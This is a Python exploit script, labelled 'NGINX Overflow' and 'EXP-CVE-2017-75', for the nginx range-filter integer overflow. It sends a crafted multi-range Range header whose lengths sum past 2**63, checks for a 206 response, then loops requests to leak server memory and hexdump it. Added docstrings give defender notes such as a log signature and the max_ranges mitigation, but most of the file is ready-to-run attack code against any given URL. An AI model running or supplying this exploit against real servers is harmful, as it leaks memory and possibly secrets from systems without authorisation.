import urllib.parse
import requests
import argparse
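class Exploit(requests.Session):
    """HTTP session that probes one URL with a crafted multi-range request.

    The script labels itself "NGINX Overflow" / "EXP-CVE-2017-75" (the CVE
    identifier looks truncated on this page).  Every request sent through
    the session carries a ``Range`` header with two suffix ranges whose
    lengths are derived from the target's ``Content-Length``.

    Defender notes: a ``Range`` header holding more than one suffix range,
    one of them with a length of about 19 digits, does not come from
    ordinary clients and is a usable log/WAF signature.  The matching
    response is a 206 whose body mentions ``Content-Range``.  Server-side,
    upgrading nginx to a release with the range-filter fix is the remedy;
    restricting multi-range requests (nginx ``max_ranges``) is the usual
    interim measure -- confirm both against the vendor advisory.
    """

    # Class-level set: shared by every instance in the process, so a chunk
    # recorded by one instance counts as "already seen" for all of them.
    buffer = set()

    def __init__(self, url):
        """Fetch ``url`` once to size the range, then install the header.

        Args:
            url: Target URL; requested here without the ``Range`` header
                to read its ``Content-Length``.
        """
        print("[DEBUG] Initializing Exploit class.")
        # A missing Content-Length is treated as 0; 623 is a fixed padding
        # added by the original author (its derivation is not shown here).
        length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
        super().__init__()
        # Assigning a plain dict replaces the session's default header set.
        # The second suffix length is the text "9223372036854" followed by
        # the decimal rendering of (776000 - length); with a six-digit
        # remainder the two lengths add up to 9223372036854776000, just
        # above 2**63 (the signed 64-bit boundary).
        self.headers = {
            "Range": f"bytes=-{length},-9223372036854{776000 - length}",
        }
        print(f"[DEBUG] Request headers set: {self.headers}")
        self.target = urllib.parse.urlsplit(url)
        print(f"[DEBUG] Target URL split into components: {self.target}")

    def check(self):
        """Return True when the target answers the crafted request with 206.

        The verdict needs both an HTTP 206 status and the literal text
        ``Content-Range`` in the decoded response body.  Any exception is
        reported and mapped to ``False``.
        """
        print("[DEBUG] Checking if the target is vulnerable.")
        try:
            response = self.get(self.target.geturl())
            print(f"[DEBUG] Received HTTP status code: {response.status_code}")
            return response.status_code == 206 and "Content-Range" in response.text
        except Exception as e:
            print(f"[DEBUG] Exception during check: {e}")
            return False

    def hexdump(self, data):
        """Print ``data`` as 16-byte rows: offset, hex bytes, printable ASCII.

        Bytes outside the 32..126 range are shown as ``.`` in the text column.
        """
        print("[DEBUG] Starting hexdump of received data.")
        for offset in range(0, len(data), 16):
            chunk = data[offset: offset + 16]
            hex_chars = " ".join(f"{byte:02x}" for byte in chunk)
            text_chars = "".join(
                chr(byte) if 32 <= byte <= 126 else "." for byte in chunk
            )
            print(f" - {offset:04x}: {hex_chars:48} {text_chars}")

    def execute(self):
        """Run ``check()`` and, on a positive verdict, collect and dump bodies.

        The request is repeated and each response body is split on CRLF;
        lines not yet in ``buffer`` are appended to the collected data.
        """
        print("[DEBUG] Executing exploit.")
        vulnerable = self.check()
        status = "+" if vulnerable else "-"
        print(f"[{status}] {self.target.netloc} is Vulnerable: {str(vulnerable).upper()}")
        if vulnerable:
            data = b""
            # NOTE(review): no iteration cap -- the loop ends only once 128
            # distinct lines were seen, on an exception, or on Ctrl+C, so
            # server logs may show a long run of identical requests.
            while len(self.buffer) < 0x80:
                try:
                    response = self.get(self.target.geturl())
                    for line in response.content.split(b"\r\n"):
                        if line not in self.buffer:
                            data += line
                            self.buffer.add(line)
                except Exception as e:
                    print(f"[DEBUG] Exception during data reception: {type(e).__name__}: {e}")
                    break
                except KeyboardInterrupt:
                    # Not an Exception subclass, hence the separate clause.
                    print("[DEBUG] Keyboard Interrupt detected.")
                    break
            if data:
                print("\n[DEBUG] Data reception complete, starting hexdump.")
                self.hexdump(data)
            else:
                print("[DEBUG] No data received.")
        else:
            print("[DEBUG] Target is not vulnerable, exploit not executed.")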
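if __name__ == "__main__":
    # Command-line entry point: one positional URL plus an optional
    # check-only switch that skips the data-collection step.
    print("[DEBUG] Starting main execution of the script.")
    parser = argparse.ArgumentParser(prog="NGINX Overflow",
                                     description="EXP-CVE-2017-75",
                                     epilog="CalebFin")
    parser.add_argument("url", type=str, help="Target URL.")
    parser.add_argument("-c", "--check", action="store_true", help="Only check if Target is vulnerable.")
    args = parser.parse_args()
    print(f"[DEBUG] Arguments parsed: URL = {args.url}, Check Flag = {args.check}")
    try:
        # Constructing Exploit already sends one plain GET to the URL.
        exploit = Exploit(args.url)
        if args.check:
            print("[DEBUG] Check flag provided, proceeding with vulnerability check.")
            vulnerable = exploit.check()
            status = "+" if vulnerable else "-"
            print(f"[{status}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}")
        else:
            print("[DEBUG] No check flag provided, attempting to execute exploit.")
            exploit.execute()
    except KeyboardInterrupt:
        print("[!] Keyboard Interrupted! (Ctrl+C Pressed)")
    except Exception as e:
        # Top-level boundary: report the failure instead of a traceback.
        print(f"[!] Exception at script top level: {type(e).__name__}: {e}")
    print("[DEBUG] Script execution finished.")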